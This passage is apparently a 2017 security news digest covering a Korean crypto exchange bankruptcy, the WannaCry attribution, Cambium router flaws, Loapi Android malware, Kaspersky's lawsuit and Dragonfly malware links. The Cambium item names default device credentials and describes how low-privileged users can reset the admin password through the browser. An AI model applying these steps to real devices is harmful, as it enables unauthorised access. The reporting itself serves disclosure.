"We will close all trades, suspend all deposits or withdrawals and take steps for bankruptcy," the exchange said in a statement which did not assign blame for the latest attack.

All its customers will have their cryptocurrency assets marked down by 25 percent, it said, adding it would do its best to "minimise" their losses by using insurance and selling the remains of the firm.

The exchange -- founded in 2013 -- brokered trades of multiple virtual currencies including bitcoin and ethereum.

It is the first time that a South Korean cryptocurrency exchange has gone bankrupt.

Investing in virtual currencies has become hugely popular in the hyper-wired South, whose trades account for some 20 percent of global bitcoin transactions.

About one million South Koreans, many of them small-time investors, are estimated to own bitcoin. Demand is so high that prices for the unit are around 20 percent higher than in the US, its biggest market.

Global bitcoin prices have soared around 20-fold this year.

Concerns over a potential bubble have unnerved Seoul's financial regulators, who last week banned its financial institutions from dealing in virtual currencies.


U.S. Declares North Korea Led Huge WannaCry Cyberattack
19.12.2017 securityweek BigBrothers
The United States officially accused North Korea late Monday of carrying out the massive WannaCry attack that infected some 300,000 computers in 150 countries earlier this year.

North Korea was widely suspected of being behind the computer virus and ransomware, which demanded payment to restore access. It has been denounced as such by Britain, but the United States had yet to follow suit.

Homeland Security Advisor Tom Bossert made the announcement in a Wall Street Journal op-ed, and was expected to provide more details in a briefing with reporters early Tuesday.

"The attack was widespread and cost billions, and North Korea is directly responsible," he wrote.

"We do not make this allegation lightly. It is based on evidence."

Among the infected computers were those at Britain's National Health Service (NHS), Spanish telecoms company Telefonica and US logistics company FedEx.

"These disruptions put lives at risk," Bossert wrote.

"North Korea has acted especially badly, largely unchecked, for more than a decade, and its malicious behavior is growing more egregious. WannaCry was indiscriminately reckless."

He said Washington must lead efforts to cooperate with other governments and businesses to "mitigate cyber risk and increase the cost to hackers," and thus improve internet security and resilience.

"When we must, the US will act alone to impose costs and consequences for cyber malfeasance," Bossert added.

President Donald Trump "has already pulled many levers of pressure to address North Korea's unacceptable nuclear and missile developments, and we will continue to use our maximum pressure strategy to curb Pyongyang's ability to mount attacks, cyber or otherwise."

The WannaCry attack spread rapidly around the globe using a security flaw in Microsoft's Windows XP operating system, an older version that is no longer given mainstream tech support by the US giant.

Ransomware, which can be used on PCs as well as tablets and smartphones, is malicious software which locks computer files and forces users to pay the attackers a designated sum in the virtual Bitcoin currency to regain access to the files.

The Washington Post cited a US official as saying Trump's administration would be urging allies to counter North Korea's cyberattack capabilities and implement all "relevant" UN Security Council sanctions.

It said the CIA had already laid blame on North Korea for the attack in November, though the assessment was classified and had not yet been previously reported.


Cambium Wireless Networking Devices Vulnerable to Attacks
19.12.2017 securityweek
Vulnerebility
A researcher has discovered nearly a dozen security issues in ePMP and cnPilot wireless networking products from Cambium, including vulnerabilities that can be exploited to take control of devices and the networks they serve.

Cambium’s ePMP and cnPilot wireless broadband solutions are used by managed services providers, governments, retailers, ISPs, hotels, schools, enterprises, and industrial organizations.

Researcher Karn Ganeshen discovered that ePMP 1000, 2000 and Force wireless broadband devices, and cnPilot R190, R200 and R201 Wi-Fi access points are affected by potentially serious vulnerabilities. The flaws were reported to Cambium in September via Rapid7 and a majority of them were patched last month.

While exploitation of the flaws normally requires access to the network, Rapid7’s Project Sonar uncovered more than 36,000 ePMP devices and 133 cnPilot systems accessible from the Internet, and many of them could be vulnerable. The highest number of exposed systems has been seen in Serbia (9,600), the United States (8.200), Italy (5,000), Brazil (3,000), Spain (2,700), Colombia (2,500) and South Africa (1,100).

Several of the vulnerabilities have been rated critical with a CVSS score of 9.0. One of them is CVE-2017-5254, a privilege escalation flaw affecting ePMP devices. These systems are shipped with several default accounts with default credentials, including admin/admin, installer/installer, home/home and readonly/readonly. The home and installer accounts don’t have admin privileges, but Ganeshen discovered that they can be used to change the admin account password.

The admin password normally cannot be changed by a installer or home user as the password field is not editable. However, an attacker who has access to the web interface with one of these low-privileged accounts can use the Inspect Element feature in their browser and delete the disabled=”” property, which makes the password field editable. The password set by the attacker for the admin account can then be used to access the web interface with administrator privileges.

Another critical privilege escalation flaw in ePMP is CVE-2017-5255. It allows an authenticated attacker – even one with a readonly account – to execute OS-level commands as root by sending a specially crafted request to a function named get_chart.

A hacker can also escalate privileges on an ePMP device by exploiting persistent cross-site scripting (XSS) vulnerabilities in the Device Name and System Description fields. An attacker with access to a device’s web interface can insert JavaScript code into these fields and the code will get executed both when the login page is accessed and after the user has logged in.

There are also a couple of other XSS flaws in the ePMP product, but these are more difficult to exploit. The XSS vulnerabilities can allow an attacker to hijack a user’s session, hook the browser, or conduct other activities that can lead to privilege escalation.

The most serious flaw affecting the cnPilot product is related to an undocumented root web shell that can be accessed by any user (CVE-2017-5259). Another critical issue in cnPilot allows privilege escalation via a direct object reference vulnerability (CVE-2017-5260).

cnPilot is also affected by information disclosure and privilege escalation flaws that have been rated medium severity.

The vulnerabilities affect ePMP products running version 3.5 and earlier of the firmware and cnPilot devices running version 4.3.2-R4 and earlier. Fixes have been introduced with the release of versions 3.5.1 and 4.4, respectively. Two issues involving the lack of cross-site request forgery (CSRF) protections and some suspicious binaries have not been patched.


This New Android Malware Can Physically Damage Your Phone
19.12.2017 thehackernews Android


Due to the recent surge in cryptocurrency prices, not only hackers but also legitimate website administrators are increasingly using JavaScript-based cryptocurrency miners to monetize by levying the CPU power of your PC to mine Bitcoin or other cryptocurrencies.
Just last week, researchers from AdGuard discovered that some popular video streaming and ripper sites including openload, Streamango, Rapidvideo, and OnlineVideoConverter hijacks CPU cycles from their over hundreds of millions of visitors for mining Monero cryptocurrency.
Now, researchers from Moscow-based cyber security firm Kaspersky Lab have uncovered a new strain of Android malware lurking in fake anti-virus and porn applications, which is capable of performing a plethora of nefarious activities—from mining cryptocurrencies to launching Distributed Denial of Service (DDoS) attacks.
Dubbed Loapi, the new Android Trojan can perform so many more malicious activities at a time that can exploit a handset to the extent that within just two days of infection it can cause the phone's battery to bulge out of its cover.
Described as a "jack-of-all-trades" by the researchers, Loapi has a modular architecture that lets it conduct a variety of malicious activities, including mining the Monero cryptocurrency, launching DDoS attacks, bombarding infected users with constant ads, redirecting web traffic, sending text messages, and downloading and installing other apps.
Loapi Destroyed An Android Phone In Just 2 Days

When analyzed a Loapi sample, Kaspersky's researchers discovered that the malware mines the Monero cryptocurrency so intensely that it destroyed an Android phone after two days of testing, causing the battery to bulge and deforming the phone cover.
According to researchers, the cybercriminals behind Loapi are the same responsible for the 2015 Android malware Podec. They are distributing the malware through third-party app stores and online advertisements that pose as apps for "popular antivirus solutions and even a famous porn site."
A screenshot in the Kaspersky blog suggests that Loapi impersonates as at least 20 variations of adult-content apps and legitimate antivirus software from AVG, Psafe DFNDR, Kaspersky Lab, Norton, Avira, Dr. Web and CM Security, among others.
Upon installation, Loapi forces the user to grant it 'device administrator' permissions by looping a pop-up until a victim clicks yes, which gives the malicious app the same power over your smartphone that you have.
This highest level privilege on a device would also make the Loapi malware ideal for user espionage, though this capability is not yet present in the malware, the Kaspersky researchers think this can be included in the future.
Loapi Malware Aggressively Fights to Protect Itself
Researchers also said the malware "aggressively fights any attempts to revoke device manager permissions" by locking the screen and closing phone windows by itself.
Loapi communicates with the module-specific command and control (C&C) servers, including advertisement module, SMS module and mining module, web crawler, and proxy module, for different functions to be performed on the infected device.
By connecting with one of the above-mentioned C&C servers, Loapi sends a list of legitimate antivirus apps that pose it danger and claims the real app as malware and urges the user to delete it by showing the pop-up in a loop until the user finally deletes the app.
"Loapi is an interesting representative from the world of malicious Android apps. It’s creators have implemented almost the entire spectrum of techniques for attacking devices: the Trojan can subscribe users to paid services, send SMS messages to any number, generate traffic and make money from showing advertisements, use the computing power of a device to mine cryptocurrencies, as well as perform a variety of actions on the internet on behalf of the user/device," the researchers concluded.
Fortunately, Loapi failed to make its ways to Google Play Store, so users who stick to downloads from the official app store are not affected by the malware. But you are advised to remain vigilant even when downloading apps from Play Store as malware often makes its ways to infect Android users.


Kaspersky Lab Sues U.S. Government Over Software Ban
19.12.2017 thehackernews BigBrothers

Moscow-based cyber security firm Kaspersky Lab has taken the United States government to a U.S. federal court for its decision to ban the use of Kaspersky products in federal agencies and departments.
In September 2017, the United States Department of Homeland Security (DHS) issued a Binding Operational Directive (BOD) ordering civilian government agencies to remove Kaspersky Lab software from their computers and networks within 90 days.
The order came amid mounting concern among United States officials that the Kaspersky antivirus software could be helping Russian government spy on their activities, which may threaten the U.S. national security.
U.S. President Donald Trump also signed into law last week legislation that bans the use of Kaspersky products within the U.S. government, capping a months-long effort to purge Kaspersky from federal agencies amid concerns it's vulnerable to Kremlin influence.
The Kaspersky's appeal is part of an ongoing campaign by the company to refute allegations that the company is vulnerable to Russian influence.
Moreover, there's no substantial evidence yet available which can prove these allegations, but an article published by US media WSJ in October claimed that Kaspersky software helped Russian spies steal highly classified documents and hacking tools belonging to the NSA in 2015 from a staffer's home PC.
Just last month, Kaspersky claimed that its antivirus package running on the staffer's PC detected the copies of the NSA exploits as malware and uploaded them to its cloud for analysis, but its analysts immediately deleted them.
Earlier this month, the NSA staffer, identified as Nghia Hoang Pho, a 67-year-old of Ellicott City, Maryland, pleaded guilty to illegally taking classified documents home, which were later stolen by Russian hackers.
Kaspersky Lab Challenges DHS's Ban on its Software in U.S. Court
Underlining that U.S. authorities have not provided any substantial evidence of wrongdoing by the company, CEO Eugene Kaspersky wrote in an open letter to the Homeland Security agency on Monday, stressing that the "DHS's decision is unconstitutional" and based purely on "subjective, non-technical public sources."
"One of the foundational principles enshrined in the U.S. Constitution, which I deeply respect, is due process: the opportunity to contest any evidence and defend oneself before the government takes adverse action," Kaspersky wrote.
"Unfortunately, in the case of Binding Operational Directive 17-01, DHS did not provide Kaspersky Lab with a meaningful opportunity to be heard before the Directive's issuance, and therefore, Kaspersky Lab's due process rights were infringed."
Kaspersky argues that the company was not given enough time to contest allegations before the DHS issued a ban, and that the documents available at the time of the ban were based more on references than a technical threat that the company could analyze and respond to.
The company also said that it wrote to DHS in mid-July to address any concerns the U.S. agency had, and DHS even acknowledged receipt of the communication in mid-August, appreciating the company's offer to provide information on the matter.
Kaspersky: DHS Harmed Kaspersky Lab's Reputation
However, Kaspersky said the agency did not follow up with the company "until the notification regarding the issuance of Binding Operational Directive 17-01" and accusing Kaspersky products of causing infosec risks on federal information systems.
"DHS has harmed Kaspersky Lab's reputation, negatively affected the livelihoods of its U.S.-based employees and U.S.-based business partners, and undermined the company’s contributions to the broader cybersecurity community," Kaspersky wrote.
"In filing this appeal, Kaspersky Lab hopes to protect its due process rights under the US Constitution and federal law and repair the harm caused to its commercial operations, its US-based employees, and its US-based business partners."
CEO Eugene Kaspersky has repeatedly denied the company's ties to any government and said it would not help a government with cyber espionage, adding that "If the Russian government comes to me and asks me to anything wrong, or my employees, I will move the business out of Russia."
In October, it was also reported that Israeli government hackers hacked into Kaspersky's network in 2015 and caught Russian hackers red-handed hacking United States government with the help of Kaspersky software.
In the wake of this incident, Kaspersky Lab also launched a transparency initiative late October, giving partners access to its antivirus source code and paying large bug bounties for security issues discovered in its products.


The thin line between BlackEnergy, DragonFly and TeamSpy attacks
19.12.2017 securityaffairs APT

Experts from McAfee Labs collected evidence that links DragonFly malware to other hacking campaigns, like BlackEnergy and TeamSpy attacks.
On September 6, Symantec published a detailed analysis of the Dragonfly 2.0 campaign that targeted dozens of energy companies this year. Threat actor is the same behind the Dragonfly campaign observed in 2014.

Further analysis conducted by McAfee Labs lead the experts into believing that the Operation Dragonfly is linked to earlier attacks.

The investigation conducted by McAfee Labs and the Advanced Threat Research team uncovered related attacks targeting the pharmaceutical, financial, and accounting industries.

The experts noticed the same techniques, tactics, and procedures (i.e. spear phishing, watering holes, and exploits of supply-chain technologies) were the same used in previous campaigns.

“By compromising well-established software vulnerabilities and embedding within them “backdoor” malware, the victims think they are installing software from a trusted vendor, while unaware of the supply-side compromise.” reads the analysis published by McAfee Labs.

Once compromised the target network, attackers used remote-desktop protocol to hop among internal or external systems, they connect either to a control server or use an internal compromised server to conduct operations.

Researchers observed threat actors using several backdoors and utilities, in one case a Trojan used in 2017 attacks was also used in a July 2013 attack.

Experts correlated the malware by analyzing their hashes, both contained the same TeamViewer that was spotted by the Hungarian security company Crysys in a report about the TeamSpy malware.

The TeamSpy hackers hit a large variety of high-level subjects including Russia-based Embassy for a not revealed undisclosed country belonging to both NATO and the European Union, multiple research and educational organizations in France and Belgium, an electronics company located in Iran and an industrial manufacturer located in Russia

Crysys researchers mentioned the same hash used in the recent attacks and correlated it to a sample that was compiled on 2011:09:07 – 09:27:58+01:00.

“Although the report attributes the attacks to a threat actor or actors and shared tactics and procedures, the motivations behind TeamSpy appear similar to those of the Dragonfly group. With identical code reuse, could the TeamSpy campaign be the work of Dragonfly?” continues McAfee Labs.

The experts discovered that the 2017 sample contained code blocks associated with BlackEnergy malware.

BlackEnergy code
BlackEnergy sample from 2016 (at left) alongside a Dragonfly sample from 2017. (Source McAfee)

“Self-deleting code is very common in malware, but it is usually implemented by creating a batch file and executing the batch instead of directly calling the delete command, as we see in the preceding examples.” continues the analysis.

“The BlackEnergy sample used in our comparison was captured in the Ukraine on October 31, 2015, and was mentioned in our post on the evolution of the BlackEnergy Trojan. It is remarkable that this piece of code is almost identical in both samples, and suggests a correlation between the BlackEnergy and Dragonfly campaigns.”

DragonFly

The experts pointed out an evolution of the code in the backdoors developed by the threat actors and the reuse of code in their campaigns.

The malicious code is fairly sophisticated in hiding details of their attacks, making hard the attribution through the use of false fl